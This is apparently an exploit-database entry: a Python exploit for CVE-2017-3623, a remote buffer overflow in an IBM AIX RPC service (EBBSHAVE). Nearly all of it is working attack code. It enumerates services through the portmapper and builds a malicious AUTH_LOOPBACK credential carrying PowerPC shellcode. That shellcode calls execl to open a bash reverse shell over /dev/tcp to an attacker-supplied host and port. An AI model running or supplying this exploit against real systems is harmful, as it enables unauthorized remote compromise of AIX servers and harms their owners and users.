# Exploit Title: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
# Date: 2018-09-19
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.ibm.com/us-en/
# Version: 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, 7200-01-01-1642
# Tested on: IBM AIX PPC
# CVE: CVE-2017-3623
# EBBISLAND / EBBSHAVE RPC Buffer Overflow for IBM AIX PPC
#!/usr/bin/python
# Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc
# Exploit code example; shellcode requires /usr/bin/bash on the target
# Example values for my AIX 7.2 LPAR:
# gid_base: 3007d390
# execl_func: d0307940
# execl_toc: f081bc20
# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled
from os import urandom
from socket import socket, AF_INET, SOCK_STREAM
from struct import pack, unpack
from sys import argv, exit
from time import time, sleep
def getCredLoopbackBody():
global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
# Doesn't matter, ljust call assumes len <= 4
node_name = 'hn'
node_length = pack('>I', len(node_name))
node_name = node_name.ljust(4, '\x00')
# Also doesn't matter
uid = pack('>I', 0)
gid = pack('>I', 0)
# Big enough to trigger an overflow
# Not big enough to trigger defensive code
# You could make this a little bit less,
# but you'd have to tweak the part 2 code
gids_len = pack('>I', 64)
base_addr = pack('>I', gid_base)
addr_8c = pack('>I', gid_base + 0x8c)
addr_a8 = pack('>I', gid_base + 0xa8)
addr_4c = pack('>I', gid_base + 0x4c)
func_addr = pack('>I', execl_func)
toc_addr = pack('>I', execl_toc)
cmd = 'bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1'
cmd = cmd.ljust(0x30, '\x00')
# Each GID is 4 bytes long, we want 64
gids = (
# +0x0 # filepath
'/usr/bin/bash\x00\x00\x00'
# +0x10 # argv[0]
'bash\x00\x00\x00\x00'
# +0x18 # argv[1]
'-c\x00\x00'
# +0x1c # argv[2]
) + cmd + (
# +0x4c # r3 = filepath
'\x70\x63\x00\x00' # andi. r3, r3, 0x0
'\x3c\x60'
) + base_addr[0:2] + ( # lis r3, ...
'\x60\x63'
) + base_addr[2:4] + ( # ori r3, r3, ...
# +0x58 # r4 = argv[0]
'\x38\x83\x00\x10' # addi r4, r3, 0x10
# +0x5c # r5 = argv[1]
'\x38\xa4\x00\x08' # addi r5, r4, 0x8
# +0x60 # r6 = argv[2]
'\x38\xc5\x00\x04' # addi r6, r5, 0x4
# +0x64 # r7 = NULL
'\x70\xe7\x00\x00' # andi. r7, r7, 0x0
# +0x68 # r2 = libc.a TOC for execl
'\x70\x42\x00\x00' # andi. r2, r2, 0x0
'\x3c\x40'
) + toc_addr[0:2] + ( # lis r2, ...
'\x60\x42'
) + toc_addr[2:4] + ( # ori r2, r2, ...
# +0x74 # execl
'\x71\x08\x00\x00' # andi. r8, r8, 0x0
'\x3d\x00'
) + func_addr[0:2] + ( # lis r8, ...
'\x61\x08'
) + func_addr[2:4] + ( # ori r8, ...
'\x7d\x09\x03\xa6' # mtctr r8
'\x4e\x80\x04\x21' # bctrl
# +0x88 # 0x14 padding
'AAAAAAAAAAAAAAAAAAAA'
# +0x9c # Will be NULL
'ZZZZ'
# +0xa0
# @+948: r5 = +0x8c
# @+968: r5 = *(+0x8c + 0x18) = *(+0xa4)
# +0xa4
# @+968: r5 = +0xa8
# @+972: r0 = *(r5 + 0x0) = *(+0xa8)
# +0xa8
# @+972: r0 = +0x4c
# @+980: ctr = r0 = +0x4c
# @+988: branch to ctr
) + addr_8c + addr_a8 + addr_4c + (
# +0xac # padding
'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
)
print ":".join("{:02x}".format(ord(c)) for c in gids)
print len(gids)
return epoch + node_length + node_name + uid + gid + gids_len + gids
def getCredLoopback():
cred_flavor = pack('>I', 0x55de) # AUTH_LOOPBACK
cred_body = getCredLoopbackBody()
cred_len = pack('>I', len(cred_body))
return cred_flavor + cred_len + cred_body
def getAuthNone():
auth_flavor = pack('>I', 0) # AUTH_NONE
auth_len = pack('>I', 0)
return auth_flavor + auth_len
def getMessage(prog_num, ver_num, proc_num, use_loopback_cred):
xid = urandom(4)
mtype = pack('>I', 0) # CALL
rpcvers = pack('>I', 2)
prog = pack('>I', prog_num)
vers = pack('>I', ver_num)
proc = pack('>I', proc_num)
cred = ( getCredLoopback() if use_loopback_cred else getAuthNone() )
verf = getAuthNone()
return xid + mtype + rpcvers + prog + vers + proc + cred + verf
def getPacket(message):
# MSB on = this is the last fragment
# LSBs = fragment length
frag = pack('>I', len(message) + 0x80000000)
return frag + message
if len(argv) < 7:
print 'Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc'
exit(1)
rhost = argv[1]
lhost = argv[2]
lport = argv[3]
gid_base = int(argv[4], 16)
execl_func = int(argv[5], 16)
execl_toc = int(argv[6], 16)
# Query the portmapper for services
services = []
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, 111)) # port 111 for portmapper
s.send(getPacket(getMessage(
100000, # portmapper
2, # version 2
4, # DUMP
False # unauth request
)))
s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
if (prog_num == 100024 # status
and proto_num == 6): # TCP
print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
services.append((prog_num, ver_num, port))
s.close()
# Try attacking
for service in services:
prog_num, ver_num, port = service
serv_str = str(prog_num) + ' v' + str(ver_num)
for attack in [False, True]:
sleep(1) # be gentle
print '[ ] ' + ( 'Attacking' if attack else 'Pinging' ) + ' ' + serv_str
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, port))
resp_len = 0
s.send(getPacket(getMessage(
prog_num,
ver_num,
0, # NULL, acts like a ping
attack
)))
s.settimeout(5) # give inetd/... a chance to spin up the service if needed
try:
resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
except:
resp_len = 0 # typically either timeout, connection error, or Ctrl+C
try:
s.close() # try closing the connection if it isn't already dead
except:
pass # connection is probably already dead
print '[ ] Got response length ' + str(resp_len)
if resp_len == 0: # suspect the service either timed out or crashed
if attack:
print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
else:
print '[-] Service probably down or otherwise misbehaving, skipping...'
break